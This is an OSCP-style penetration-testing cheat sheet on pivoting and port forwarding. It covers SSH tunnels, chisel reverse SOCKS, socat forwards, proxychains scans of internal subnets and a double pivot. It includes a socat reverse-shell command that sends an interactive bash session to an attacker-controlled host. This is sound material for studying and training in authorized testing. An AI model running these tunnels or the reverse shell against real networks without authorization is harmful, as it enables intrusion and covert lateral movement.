######################################################################
# 11 – PIVOTING & PORT FORWARDING (OSCP 2025)
######################################################################

===========================================================
# 1. SSH Pivoting
===========================================================

-------------------------------
# 1.1 SSH Dynamic SOCKS Proxy (BEST)
-------------------------------
ssh -D 1080 $user@$pivot

Use with proxychains:
proxychains nmap -sT -Pn internal_ip

-------------------------------
# 1.2 SSH Local Port Forward
-------------------------------
ssh -L 13389:10.10.2.20:3389 $user@$pivot

Access RDP:
xfreerdp /v:127.0.0.1:13389

-------------------------------
# 1.3 SSH Remote Port Forward
-------------------------------
ssh -R 0.0.0.0:8888:127.0.0.1:80 $user@$pivot

===========================================================
# 2. Chisel Pivoting
===========================================================

-------------------------------
# 2.1 Start Chisel Server (Kali)
-------------------------------
chisel server -p 9001 --reverse

-------------------------------
# 2.2 Start Chisel Client (Target)
-------------------------------
chisel client $localip:9001 R:socks

Proxychains example:
proxychains crackmapexec smb 10.10.2.10

===========================================================
# 3. Socat
===========================================================

-------------------------------
# Local → Remote Forward
-------------------------------
socat TCP-LISTEN:8080,fork TCP:10.10.2.50:80

-------------------------------
# Reverse Shell via Socat
-------------------------------
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$localip:4444

===========================================================
# 4. Meterpreter Replacement (Manual)
===========================================================

-------------------------------
# Enumerate Internal Network
-------------------------------
ipconfig /all  
arp -a  
route print  

-------------------------------
# Scan Internal Hosts (Proxychains)
-------------------------------
proxychains nmap -sT 10.10.2.0/24

===========================================================
# 5. Double Pivot Example
===========================================================

# Attack → Pivot1 → Pivot2 → Target
ssh -D 1080 user@pivot1  
proxychains ssh -D 2080 user@pivot2  
proxychains2 nmap -sT target

######################################################################
# END OF 11_PIVOTING.TXT
######################################################################
